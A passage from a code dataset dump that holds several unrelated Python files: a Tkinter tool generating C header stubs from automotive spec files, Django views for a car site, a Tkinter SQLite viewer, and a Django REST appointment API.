found...Calibration_Data string getting parsed...\\n\")\r\n Calibration_Data_str = s\r\n #Calibration_Data = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n elif InD is True:\r\n logger.debug(\"Input_Data string found...Input_Data string getting parsed...\\n\")\r\n Input_Data_str = s\r\n Input_Data = Parse_Inputs(s)\r\n logger.debug(\"Parse success\\n\")\r\n pass\r\n elif OpD is True:\r\n #logger.debug(\"Data_Definition string found...Data_Definition string getting parsed...\\n\")\r\n Data_Definition_str = s\r\n #Data_Definition = Parse_Inputs(s)\r\n #logger.debug(\"Parse success\\n\")\r\n pass\r\n else:\r\n pass\r\n GnI = True \r\n else:\r\n pass\r\n try:\r\n s = rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n else:\r\n try:\r\n s = s + rfh.readline()\r\n except:\r\n logger.warning('Specification-{} Line skipped for parse\\n'.format(s))\r\n \r\n if GnI is True:\r\n break\r\n logger.info(\",,Spec Parse process over\\n\")\r\n else:\r\n logger.error(\"No Input data or Output data found in module\\n\")\r\n logger.debug(\"Spec closed. \\n\")\r\n\r\n if OpD is True or InD is True:\r\n if OpD is True:\r\n logger.debug(\"Data_Definition_str : {} \\n\".format(Data_Definition_str))\r\n if InD is True:\r\n logger.debug(\"Input_Data_str : {} \\n\".format(Input_Data_str))\r\n if CaD is True:\r\n logger.debug(\"Calibration_Data_str : {} \\n\".format(Calibration_Data_str))\r\n if CnD is True:\r\n logger.debug(\"Configuration_Data_str : {} \\n\".format(Configuration_Data_str))\r\n if ImA is True:\r\n logger.debug(\"Import_Actions_str : {} \\n\".format(Import_Actions_str))\r\n\r\n logger.info(\",,Creating module_inputs.h ...\\n\")\r\n with open(os.path.join(pp_folder_path,'module_inputs.h'),'w') as wfh:\r\n logger.info(\",,Creating input data declarations list ...\\n\")\r\n dl = []\r\n for data in Input_Data:\r\n logger.debug(\"Identifying data tyoe of {} ...\\n\".format(data.name))\r\n dt = identify_DT(data.hexR)\r\n logger.debug(\"Identified as {}..\\n\".format(dt))\r\n logger.debug(\"Creating declaration..\\n\")\r\n if data.name.startswith('NC') or data.name.startswith('NLC'):\r\n pass\r\n elif data.name.startswith('LV_'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()+data.name[data.name.find('['):]\r\n else:\r\n name = data.name.lower()\r\n dl.append('extern\\tflag\\t'+name+';\\n')\r\n elif data.name.startswith('LC_') or data.name.startswith('C_') or data.name.startswith('CLF_'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()+data.name[data.name.find('['):]\r\n else:\r\n name = data.name.lower()\r\n dl.append('extern\\tconst\\t'+dt+'\\t'+name+';\\n')\r\n elif data.name.startswith('IP_') or data.name.startswith('ID_'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()\r\n else:\r\n name = data.name.lower()\r\n maiden_name = name\r\n for dim in data.size:\r\n name = name + '[' + dim + ']'\r\n dl.append('extern\\tconst\\t'+dt+'\\t'+name+';\\n')\r\n prefix = ['X_','Y_','Z_']\r\n for ax in data.axis:\r\n dl.append('#define\\t'+prefix.pop(0)+maiden_name+'\\t'+ax+'\\n')\r\n elif data.name.startswith('LDP'):\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()\r\n else:\r\n name = data.name.lower()\r\n name = name + '[' + data.mode + '+1]'\r\n dl.append('extern\\tconst\\t'+dt+'\\t'+name+';\\n')\r\n else:\r\n if data.name.find('[')>-1:\r\n name = data.name[0:data.name.find('[')].lower()+data.name[data.name.find('['):]\r\n else:\r\n name = data.name.lower()\r\n dl.append('extern\\t'+dt+'\\t'+name+';\\n')\r\n logger.info(\",,Declaration creation process over..\\n\")\r\n logger.info(\",,Entering fetch_NC_def_frmPP for Fetching collected NC's definition from PP folder\\n\") \r\n fetched_ncees = fetch_NC_def_frmPP(pp_folder_path)\r\n logger.info(\",,Out of fetch_NC_def_frmPP..\\n\")\r\n logger.debug(\"Fetch complete in fetched_ncees = {}\\nWritting it to module_inputs.h now\\n\".format(fetched_ncees))\r\n wfh.write(\"#ifndef MODULE_INPUTS_H\\n\")\r\n wfh.write(\"#define MODULE_INPUTS_H\\n\")\r\n wfh.write('\\n'*2)\r\n for nc in fetched_ncees:\r\n wfh.write(nc)\r\n logger.debug(\"Writting data declarations to module_inputs.h\\n\")\r\n for data in sorted(set(dl)):\r\n wfh.write(data)\r\n try:\r\n logger.info(\",,Entering fetch_ACTIONdefs_frmPP\\n\")\r\n logger.debug(\"Fetching needed action defs from PIS\\n\")\r\n actions_dict = fetch_ACTIONdefs_frmPP(pp_folder_path)\r\n logger.info(\",,Out of fetch_ACTIONdefs_frmPP..\\n\")\r\n logger.debug(\"Fetch completed in form of ACTION dictionary : {}\\nNow writting it to module_inputs.h\\n\".format(actions_dict))\r\n logger.debug(\"Import_Actions : {}\".format(Import_Actions))\r\n for actions_1 in Import_Actions:\r\n if actions_1 in actions_dict:\r\n if len(set(actions_dict[actions_1]))>1:\r\n comment = \"/*Warning : {} declarations available. Choose one by commenting others*/\\n\".format(len(set(actions_dict[actions_1])))\r\n wfh.write(comment)\r\n for defs in set(actions_dict[actions_1]):\r\n wfh.write(defs)\r\n else:\r\n for defs in set(actions_dict[actions_1]):\r\n wfh.write(defs)\r\n else:\r\n comment = \"/*Info : Import Action '{}' does not exist in PIS. Please create a stub here*/\\n\".format(actions_1)\r\n wfh.write(comment)\r\n except:\r\n logger.error(\"Exception occured while collecting or writting Actions - fn name - {}\\n\".format('fetch_ACTIONdefs_frmPP'))\r\n wfh.write('\\n'*2)\r\n wfh.write(\"#endif\")\r\n else:\r\n logger.error(\"No Input data or Output data found in module\\n\")\r\n else:\r\n logger.error(\"Exception : Invalid Specpath!! Path should end with .doc Eg: d\\work\\MCXXXX01.00A.DOC \\n PS:Export spec in .doc format from Limas\\n\")\r\n fail_message = \"Invalid Specpath!! Export spec in .doc format from Limas\\n\"\r\n lo_label3.config(fg='#ff0000',text = fail_message) \r\n \r\n\r\ndef copy_grls(entry3):\r\n global Input_folder_path\r\n global work_folder_path\r\n global var\r\n entry3 = entry3.lower()\r\n logger.debug(\"Proceeding to copy grl's by scanning checkbutton...\")\r\n if var.get()==1:\r\n logger.debug(\"Checkbutton enabled. Looking for files...\")\r\n for root,dirs,files in os.walk(work_folder_path):\r\n for file in files:\r\n if file.endswith('.grl') and file.startswith(entry3):\r\n if entry3+'.grl' == file:\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n if entry3+'_prj.grl' == file:\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n if file.startswith(entry3+'_confi'):\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n if file.startswith(entry3+'_nvdat'):\r\n shutil.copyfile(os.path.join(root,file),os.path.join(Input_folder_path,file))\r\n for root,dirs,files in os.walk(work_folder_path):\r\n for file in files:\r\n if file == 'fcut.grl':\r\n logger.debug(\"Copying fcut grl file...\")\r\n shutil.copyfile(os.path.join(root,'fcut.grl'),os.path.join(Input_folder_path,'fcut.grl'))\r\n if file == 'local_data_type.grl':\r\n logger.debug(\"Copying local_data_type grl file...\")\r\n shutil.copyfile(os.path.join(root,'local_data_type.grl'),os.path.join(Input_folder_path,'local_data_type.grl'))\r\n\r\n\r\ndef collect_nc_data_n_actions(specpath,base_path,pp_folder_path):\r\n global work_folder_path\r\n global logger\r\n work_folders = ['asw','bsw','aggr']\r\n work_folder_path = os.path.join(base_path,'work')\r\n if os.path.isdir(os.path.join(work_folder_path,'app')):\r\n work_folders.append('app')\r\n logger.info(\",Proceeding to collect ACTIONS\\n\")\r\n with open(os.path.join(pp_folder_path,'all_actions.h'), \"w\") as wfh_var:\r\n wfh_var.write('#ifndef ALL_ACTIONS_H\\n')\r\n wfh_var.write('#define ALL_ACTIONS_H\\n')\r\n #collecting actions\r\n for dirss in work_folders:\r\n logger.debug(\"Scanning directory {} for action prototypes...\".format(dirss))\r\n action_folder_path = os.path.join(work_folder_path,dirss)\r\n for roott, dirrs, filess in os.walk(action_folder_path):\r\n for file in filess:\r\n if file.endswith('.h') and (not file.endswith('_mcr.h')):\r\n logger.debug(\"{} scanning\".format(file))\r\n if not (file == 'efx.h'):\r\n with open(os.path.join(roott,file), \"r\") as rfhh:\r\n s = \" \"\r\n while(s):\r\n try:\r\n s = rfhh.readline()\r\n if s.strip().startswith('extern'):\r\n s = s.strip()\r\n L = s.split()\r\n size = len(L)\r\n if size>2:\r\n if L[2].startswith('ACTION_') and (s[-1] == ';'):\r\n wfh_var.write(s+'\\n')\r\n except:\r\n logger.warning(',,{}-{} - Line skipped for parse. It contains unknown chars. FUNC - collect_nc_data_n_actions\\n'.format(file,s))\r\n\r\n wfh_var.write('#endif\\n')\r\n logger.info(\",ACTION's collected!!\")\r\n try:\r\n logger.info(\",Spec parsing started for spec {}...\\n\".format(specpath))\r\n spec_parser(specpath,pp_folder_path)\r\n logger.info(\",Spec parsing complete with out errors!!\")\r\n except:\r\n logger.error(\"Exception occured while parsing spec\\n\")\r\n\r\ndef create_dummy_files(filepath,pp_folder_path,path_for_CI_folder):\r\n global Input_folder_path\r\n namelist = []\r\n logger.debug(\"Opening the file to collect list of needed headers...!!\")\r\n with open(filepath, \"r\") as rfh_1:\r\n s = \" \"\r\n while(s):\r\n try:\r\n s = rfh_1.readline()\r\n except:\r\n logger.warning('create_dummy_files1-{} Line skipped for parse'.format(s))\r\n if s.startswith('#include'):\r\n logger.debug(\"#include found in - {}\".format(s))\r\n s = s.strip()\r\n L = re.split('[><]',s)\r\n logger.debug(\"Split string : {}\".format(L))\r\n size = len(L)\r\n if size>1:\r\n name = L[1].strip()\r\n namelist.append(name)\r\n finallist = set(namelist)\r\n path_split = str(filepath).split('\\\\')\r\n module_name = path_split[-1].replace('.c','')\r\n imfile = module_name+'_im.h'\r\n if imfile in finallist:\r\n logger.debug(\"module import header found...\")\r\n ext_path = str(filepath).replace('.c','_im.h')\r\n logger.debug(\"new path : {}...\".format(ext_path))\r\n ext_path = pathlib.Path(pathlib.PureWindowsPath(ext_path))\r\n namelist = []\r\n with open(ext_path, \"r\") as rfh_2:\r\n logger.debug(\"module import header opened for reading...\")\r\n s = \" \"\r\n while(s):\r\n try:\r\n s = rfh_2.readline()\r\n except:\r\n logger.warning('create_dummy_files2 - {} Line skipped for parse'.format(s))\r\n if s.startswith('#include'):\r\n logger.debug(\"#include found in - {}\".format(s))\r\n s = s.strip()\r\n L = s.split('<')\r\n size = len(L)\r\n if size>1:\r\n name = L[1][:-1]\r\n namelist.append(name)\r\n for files in namelist:\r\n finallist.add(files)\r\n logger.debug(\"List obtained!! \\nProceeding to create Collect_Inputs_module_name folder and dummy headers...!!\")\r\n try:\r\n col_inp_fol = os.path.join(path_for_CI_folder,'Collect_Inputs')\r\n fol_name = 'Collect_Inputs_'+module_name\r\n Input_folder_path = os.path.join(col_inp_fol,fol_name)\r\n f = [x[1] for x in os.walk(path_for_CI_folder)]\r\n if 'Collect_Inputs' in f[0]:\r\n g = [y[1] for y in os.walk(col_inp_fol)]\r\n if fol_name in g[0]:\r\n shutil.rmtree(Input_folder_path)\r\n os.mkdir(Input_folder_path)\r\n else:\r\n os.mkdir(Input_folder_path)\r\n else:\r\n os.mkdir(col_inp_fol)\r\n os.mkdir(Input_folder_path)\r\n logger.debug(\"{} folder created !!\\nCreating headers {}...!!\".format(fol_name,finallist))\r\n for names in finallist:\r\n with open(os.path.join(Input_folder_path,names), \"w\") as wfh_1:\r\n name = names.upper()\r\n name = name.replace('.','_')\r\n guard1 = '#ifndef '+name\r\n guard2 = '#define '+name\r\n guard3 = '#endif'\r\n wfh_1.write(guard1 + '\\n')\r\n wfh_1.write(guard2)\r\n wfh_1.write('\\n'*10)\r\n wfh_1.write(guard3)\r\n logger.debug(\"Headers created !!Moving module_inputs.h,all_actions.h,all_hash_defines.h to {} folder\\n\".format(fol_name))\r\n shutil.move(os.path.join(pp_folder_path,'module_inputs.h'),os.path.join(Input_folder_path,'module_inputs.h'))\r\n shutil.move(os.path.join(pp_folder_path,'all_actions.h'),os.path.join(Input_folder_path,'all_actions.h'))\r\n shutil.move(os.path.join(pp_folder_path,'all_hash_defines.h'),os.path.join(Input_folder_path,'all_hash_defines.h'))\r\n logger.debug(\"Move complete!!\")\r\n except:\r\n logger.error(\"Exception occoured while removing old {} folder and \\nsubsequently creating dummy files!!\".format(fol_name))\r\n fail_message = \"Exception occoured while removing old {} folder and \\nsubsequently creating dummy files!!\\nEnsure {} folder or its files are not in use.\".format(fol_name,fol_name)\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n\r\ndef setuplogger(path_for_CI_folder):\r\n #Create and configure logger\r\n logging.basicConfig(filename=os.path.join(path_for_CI_folder,\"debug_log.csv\"), format='%(levelname)s,%(asctime)s,%(message)s', filemode='w')\r\n #Setting the threshold of logger to DEBUG\r\n logger.setLevel(logging.DEBUG)\r\n\r\ndef gen_file_api(entry,entry3,entry2):\r\n global Input_folder_path\r\n pp_folder_path = \"\"\r\n pp_fol_exist = False\r\n start = time.time()\r\n filepath = pathlib.Path(pathlib.PureWindowsPath(entry))\r\n specpath = pathlib.Path(pathlib.PureWindowsPath(entry2))\r\n split_fp = str(filepath).split('\\\\')\r\n base_path = \"\"\r\n valid_path = False\r\n for fols in split_fp:\r\n if fols != 'work':\r\n base_path = base_path+fols+'\\\\'\r\n PIS = fols\r\n else:\r\n valid_path = True\r\n break\r\n path_for_CI_folder = base_path.replace(PIS+'\\\\',\"\")\r\n if valid_path is True:\r\n setuplogger(path_for_CI_folder)\r\n fols_in_PIS = os.listdir(base_path)\r\n \r\n if os.path.isdir(os.path.join(base_path,pp_folder_td4)):\r\n pp_folder_path = os.path.join(base_path,pp_folder_td4)\r\n pp_fol_exist = True\r\n else:\r\n for dirss in fols_in_PIS:\r\n if dirss.startswith('_FS_'):\r\n pp_folder_path = os.path.join(base_path,dirss,pp_folder_td5)\r\n pp_fol_exist = True\r\n break\r\n if pp_fol_exist is True: \r\n logger.debug(\"Logger setup...\")\r\n logger.info(\"Entered C-file path: <{}>\\n\".format(filepath))\r\n logger.info(\"Entered Spec path: <{}>\\n\".format(specpath))\r\n logger.info(\"Entered aggr: <{}>,Tick enabled: <{}>\\n\".format(entry3,var.get())) \r\n logger.debug(\"Base Path: <{}>\\n\".format(base_path))\r\n logger.info(\"Preprocess Folder Path: <{}>\\n\".format(pp_folder_path))\r\n logger.debug(\"Proceeding to collect NC's, variables and ACTION's...\\n\") \r\n try:\r\n logger.info(\"Entering COLLECT_NC_DATA_N_ACTIONS\\n\")\r\n collect_nc_data_n_actions(specpath,base_path,pp_folder_path)\r\n logger.info(\"Out of COLLECT_NC_DATA_N_ACTIONS\\n\")\r\n logger.debug(\"NC's, variables and ACTION's collected successfully !!Proceeding to create dummy headers...\\n\") \r\n try:\r\n logger.info(\"Entering CREATE_DUMMY_FILES\\n\")\r\n create_dummy_files(filepath,pp_folder_path,path_for_CI_folder)\r\n logger.info(\"Out of CREATE_DUMMY_FILES\\n\")\r\n logger.debug(\"Creation of Collect_Inputs_module name folder and dummy headers successful !!Proceeding to copy grl's...\\n\") \r\n try:\r\n logger.info(\"Entering COPY_GRLS\\n\")\r\n copy_grls(entry3)\r\n logger.info(\"Out of COPY_GRLS\\n\")\r\n logger.debug(\"Copy successfull !!\\nReady for next run...\\n\")\r\n logger.debug(\"---------------------------------------------\"*3)\r\n shutil.copyfile(os.path.join(path_for_CI_folder,'debug_log.csv'),os.path.join(Input_folder_path,'debug_log.csv'))\r\n end = time.time()\r\n tt = round((end-start),3)\r\n pass_message = \"Find all inputs in Collect_Inputs_module_name folder created at\\n\"+Input_folder_path+\"\\nTask finished in {a} secs.\".format(a=tt)\r\n lo_label3.config(fg='#000099',text = pass_message)\r\n except:\r\n logger.error(\"Exception occoured while in COPY_GRLS\\n\")\r\n fail_message = \"Exception occoured while copying grl files!!\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n except:\r\n logger.error(\"Exception occoured while in CREATE_DUMMY_FILES\\n\")\r\n fail_message = \"Exception occoured while creating dummy files!!\\nPlease check the entered path:{a}\\nIdeally it should end with a c-file name available inside work folder\".format(a=entry)\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n except:\r\n logger.error(\"Exception occoured while in COLLECT_NC_DATA_N_ACTIONS\\n\")\r\n fail_message = \"Exception occoured while collecting NC's, data and actions!!\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n else:\r\n logger.error(\"Exception occoured while accessing preprocess_gen folder. Please use builded software.\\n\")\r\n fail_message = \"Exception occoured while finding preprocess_gen folder for selected build platform.\\n Please use builded software.\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n else:\r\n fail_message = \"Invalid path!! \\nCopy the full file path\"\r\n lo_label3.config(fg='#ff0000',text = fail_message)\r\n\r\n \r\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH,bg='#FAD15A' )\r\ncanvas.pack()\r\nframe = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nframe.place(relx=0.008,rely=0.025,relwidth=0.984,relheight=0.115)\r\nframe2 = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nframe2.place(relx=0.008,rely=0.155,relwidth=0.984,relheight=0.115)\r\nlabel = tk.Label(frame, text=\"C-File:\", font=('Times',15))\r\nlabel.place(relx=0.0001,relwidth=0.08,relheight=1)\r\nentry1 = tk.Entry(frame, bg='white',font=('Serif',12))\r\nentry1.place(relx=0.090,relwidth=0.75,relheight=1)\r\n\r\nlabel2 = tk.Label(frame2, text=\"Spec:\", font=('Times',15))\r\nlabel2.place(relx=0.0001,relwidth=0.08,relheight=1)\r\nentry2 = tk.Entry(frame2, bg='white',font=('Serif',12))\r\nentry2.place(relx=0.090,relwidth=0.91,relheight=1)\r\n\r\nlower_frame = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nentry3 = tk.Entry(lower_frame, bg='white',font=(\"Serif\",12))\r\nlowerside_frame = tk.Frame(root, bd=5,highlightbackground=\"black\",highlightthickness=1)\r\nlabel_lsf = tk.Label(lowerside_frame, text=\"Build Platform :\", font=('Serif',11,'bold'))\r\n\r\nbutton = tk.Button(frame, text=\"Generate Files\", bg='#c2c2a3', font=('Times',14), command=lambda: gen_file_api(entry1.get(),entry3.get(),entry2.get()))\r\nbutton.place(relx=0.845,relwidth=0.1549,relheight=1)\r\nbutton.config(state=DISABLED)\r\n\r\nlower_frame.place(relx=0.008,rely=0.285,relwidth=0.5, relheight=0.205)\r\nentry3.place(relx=0.08,rely=0.5,relwidth=0.15,relheight=0.39)\r\nentry3.config(state=DISABLED)\r\n\r\ndef Rbuttoncheck():\r\n global v\r\n if v.get() == '1' or v.get() == '2':\r\n button.config(state=NORMAL)\r\n else:\r\n button.config(state=DISABLED)\r\n\r\nlowerside_frame.place(relx=0.516,rely=0.285,relwidth=0.476, relheight=0.205)\r\nlabel_lsf.place(relx=0.008,rely=0.1,relwidth=0.3,relheight=0.3)\r\nfor (text, value) in values.items(): \r\n Radiobutton(lowerside_frame, text = text, variable = v, value = value, command=Rbuttoncheck).pack(side = TOP, ipady = 8)\r\n\r\ndef activateCheck():\r\n global var\r\n if var.get() == 1:\r\n entry3.config(state=NORMAL)\r\n elif var.get() == 0:\r\n entry3.config(state=DISABLED)\r\n\r\ncb = tk.Checkbutton(lower_frame,text='Enable to copy aggr specific common grl files',font=('Serif',11,'bold'),variable=var,command=activateCheck,anchor='nw')\r\ncb.place(rely=0.03,relwidth=1,relheight=0.45)\r\n\r\nlower_frame2 = tk.Frame(root,bg='#f6f678', bd=3,highlightbackground=\"black\",highlightthickness=1)\r\nlower_frame2.place(relx=0.008,rely=0.505,relwidth=0.984,relheight=0.48)\r\n\r\nlo_label3 = tk.Label(lower_frame2,font=('Serif',10,'bold'),anchor='nw', justify='left')\r\nlo_label3.place(relx=0.0001,rely=0,relwidth=0.9998,relheight=1)\r\n\r\nroot.mainloop()\r\n","repo_name":"dreamgoogle/python_stuff","sub_path":"input_data_from_pp_gui.py","file_name":"input_data_from_pp_gui.py","file_ext":"py","file_size_in_byte":49047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"920102865","text":"from django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom carzone import settings\nfrom .models import *\nfrom cars.models import *\n\n# Create your views here.\ndef home(request):\n team = Team.objects.all()\n featured_cars = Car.objects.order_by(\"-created_date\").filter(is_featured=True)\n all_cars = Car.objects.order_by(\"created_date\")\n model_search = Car.objects.values_list('model',flat=True).distinct()\n city_search = Car.objects.values_list('city', flat=True).distinct()\n year_search = Car.objects.values_list('year', flat=True).distinct()\n body_style_search = Car.objects.values_list('body_style', flat=True).distinct()\n data = {\n 'teams':team,\n 'featured_cars':featured_cars,\n 'all_cars':all_cars,\n 'model_search':model_search,\n 'city_search':city_search,\n 'year_search':year_search,\n 'body_style_search':body_style_search,\n }\n return render(request, 'pages/home.html',data)\ndef about(request):\n team = Team.objects.all()\n data = {\n 'teams':team,\n }\n return render(request, 'pages/about.html', data)\n\ndef services(request):\n return render(request, 'pages/services.html', {})\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n email = request.POST.get('email')\n subject = request.POST.get('subject')\n phone = request.POST.get('phone')\n message = request.POST.get('message')\n\n # admin_info = User.objects.get(is_superuser=True).email\n # send_mail(\n # f'{name} / {subject} / {phone} ',\n # message,\n # settings.EMAIL_HOST_USER,\n # [email,admin_info],\n # fail_silently=False,\n # )\n\n messages.success(request,'Thank you for contact us')\n\n return redirect('contact')\n\n return render(request, 'pages/contact.html', {})","repo_name":"kmard/carzone_project","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7634655090","text":"from tkinter import *\nimport tkinter.ttk as ttk\nimport connection\n\ndb = \"./sqlite.db\" #container db location\n\nroot = Tk()\nroot.title(\"Python - Display SQLite3 Data In TreeView\")\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\nwidth = 1000\nheight = 800\nx = (screen_width/2) - (width/2)\ny = (screen_height/2) - (height/2)\nroot.geometry('%dx%d+%d+%d' % (width, height, x, y))\nroot.resizable(1,1)\n\n#==================================FRAME==============================================\nTop = Frame(root, width=700, height=50, bd=9, relief=\"raise\")\nTop.pack(side=TOP)\nButton_Group=Frame(root, width=700, height=50)\nButton_Group.pack(side=TOP)\nButtons = Frame(Button_Group, width=200, height=50)\nButtons.pack(side=LEFT)\nButtons1 = Frame(Button_Group, width=500, height=50)\nButtons1.pack(side=RIGHT)\n\nV_Group=Frame(root, width=700, height=50,background='red')\nV_Group.pack(side=TOP)\nVL_Group=Frame(V_Group, width=700, height=50)\nVL_Group.pack(side=LEFT)\nLabels = Frame(VL_Group, width=200, height=50)\nLabels.pack(side=LEFT)\nEntrys = Frame(VL_Group, width=500, height=50)\nEntrys.pack(side=LEFT)\n\nBody = Frame(root, width=700, height=300, bd=8, relief=\"raise\")\nBody.pack(side=BOTTOM, expand=True, fill='both')\n \n#==================================LABEL WIDGET=======================================\ntxt_title = Label(Top, width=300, font=('arial', 24), text = \"Python - Display SQLite3 Data In TreeView\")\ntxt_title.pack()\nl1=Label(Buttons1,text='Output here',font=20) # display message\nl1.pack(side=RIGHT)\n\n#==================================METHODS============================================\ndef populateView(filter):\n tree.delete(*tree.get_children())\n print(\"attempting connection\")\n connection.Database(db)\n print(\"connection extablished\")\n connection.cursor.execute(\"SELECT * FROM `windchill_vault_20220224` where column4 like ? ORDER BY `column14` ASC LIMIT 100 \", ('%'+filter+'%',)) \n fetch = connection.cursor.fetchall()\n columns = [column[0] for column in connection.cursor.description]\n # Headings of respective columns\n try:\n # column identifiers \n tree[\"columns\"] = columns\n \n for i in columns:\n tree.column(i,stretch=NO, minwidth=0, width=200)\n tree.heading(i, text =i)\n except Exception as e:\n print(e)\n\n tree['show'] = 'headings'#remove empty first column\n\n for data in fetch:\n tree.insert('', 'end', values=data)\n\n addWidgets(columns)\n\n connection.cursor.close()\n connection.conn.close()\n \n return fetch, columns\n\nref=[] # to store the references widgets\ndef addWidgets(columns):\n for j , name in enumerate(columns):\n l=Label(Labels,text=name,font=20,fg='white')\n l.grid(row=j,column=0,padx=3, pady= 6)\n \n my_search = StringVar(name=f'{j:02}')\n e = Entry(Entrys, font=20,bg='gray',textvariable=my_search) \n e.grid(row=j, column=1,padx=10,pady=3) \n my_search.trace(\"w\", lambda name, index, mode, sv=my_search: filterTreeView(sv))\n\n ref.append(e) # store references \n\ndef my_check():\n my_flag=False\n for w in ref:\n if(len(w.get())<3):\n my_flag=True\n if(my_flag==False):\n l1.config(text=\"Form can be submitted\",fg='green')\n else:\n l1.config(text=\"Fill all the entries\",fg='red' )\n l1.after(3000, lambda: l1.config(text=''))\n\ndef filterTreeView(sv):\n search = sv.get().capitalize()\n # first clear the treeview\n tree.delete(*tree.get_children())\n # then insert matched items into treeview\n # TODO: uncomment\n try:\n for item in data_rows:\n print()\n index=int(str(sv))\n print(f'{index:02}')\n print(index)\n if search in item[index]:\n tree.insert(\"\", \"end\", values=item)\n except Exception as e:\n print(e)\n\n#==================================BUTTONS WIDGET=====================================\nbtn_display = Button(Buttons, width=15, text=\"Display All\", command=populateView)\nbtn_display.pack(side=LEFT,)\n\nb1=Button(Buttons1,text='Search', bg='lightgreen',command=lambda: my_check(),font=18)\nb1.pack(side=LEFT)\n \n#==================================LIST WIDGET========================================\nscrollbary = Scrollbar(Body, orient=VERTICAL)\nscrollbarx = Scrollbar(Body, orient=HORIZONTAL)\ntree = ttk.Treeview(Body, selectmode ='browse',yscrollcommand=scrollbary.set, xscrollcommand=scrollbarx.set)\ntree.grid(row=0,column=1,padx=30,pady=20)\ntree.pack(expand=True, fill='both')\n\n#==================================INITIALIZATION=====================================\n# Populate data\ndata_rows,columns = populateView('{$CAD_NAME}')\n\nif __name__ == '__main__':\n root.mainloop()","repo_name":"coxonch/SimpleTkinterDockerTest","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33419752222","text":"from rest_framework import status\nfrom rest_framework.response import Response \nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom doctors.models import Doctor \n\nfrom patients.models import Patient \nfrom patients.serializers import BasicPatientSerializer\n\nfrom citas_express.serializers import CitaExpressSerializer, BasicCitaExpSerializer\nfrom citas_express.models import CitaExpress \n#PATIENT VIEWS\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createCitaExp(request):\n '''\n {\"patient\": \"\", \"appointment_reason\": \"Razon de la cita\"}\n ''' \n try:\n patient = Patient.objects.get(id=request.data['patient'])\n except:\n return Response({'Error': 'No hay un paciente con ese id'})\n print(patient)\n patient_serializer = BasicPatientSerializer(instance=patient, data=request.data, partial=True)\n patient_serializer.is_valid()\n\n serializer = CitaExpressSerializer(data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef checkCita(request, id):\n try:\n cita_exp = CitaExpress.objects.get(id=id)\n except:\n return Respnse({'Error': 'No hay una cita con ese id'})\n\n doc = cita_exp.doctor\n\n if doc == None:\n return Response('Su cita aun no ha sido aceptada')\n else:\n return Response('Su cita ha sido aceptada por el Doctor {}'.format(doc))\n\n\n#DOCTORS VIEWS \n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef waitingRoom(request):\n citas = CitaExpress.objects.filter(taken=False)\n serializer = BasicCitaExpSerializer(instance=citas, many=True, partial=True)\n\n \n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef takeCita(request, id):\n '''\n {\n \"id_cita\": \"\",\n }\n '''\n data = request.data\n try:\n doc = Doctor.objects.get(id=id)\n except:\n return Response({'Error': 'No hay un doctor con ese id'})\n\n try:\n cita_exp = CitaExpress.objects.get(id=data['id_cita'])\n except:\n return Response({'Error': 'No hay una cita con ese id'})\n \n cita_exp.doctor = doc\n cita_exp.taken = True\n cita_exp.save()\n\n return Response(\"Cita aceptada en un momento iniciara la videollamada\", status=status.HTTP_200_OK)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef completeCitaExp(request, id):\n try:\n patient = Patient.objects.get(id=id)\n except:\n return Response({'Error': 'No hay un paciente con ese id'})\n \n cita_exp = CitaExpress.objects.get(patient=patient, completed=False)\n cita_exp.completed = True\n cita_exp.save()\n \n\n return Response('Su cita ha sido terminada correctamente', status=status.HTTP_200_OK)\n\n","repo_name":"dreamofguitar/C2D-Django-Rest-Celery-Docker-Heroku-deploy","sub_path":"citas_express/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26229917440","text":"import argparse\nimport requests\nimport sys\nimport json\n\nimport datetime\n# from tzlocal import get_localzone\nfrom pytz import timezone\n\nfrom urllib import urlencode\nfrom requests.auth import HTTPBasicAuth\nfrom refreshbooks import api\n\nfrom pprint import 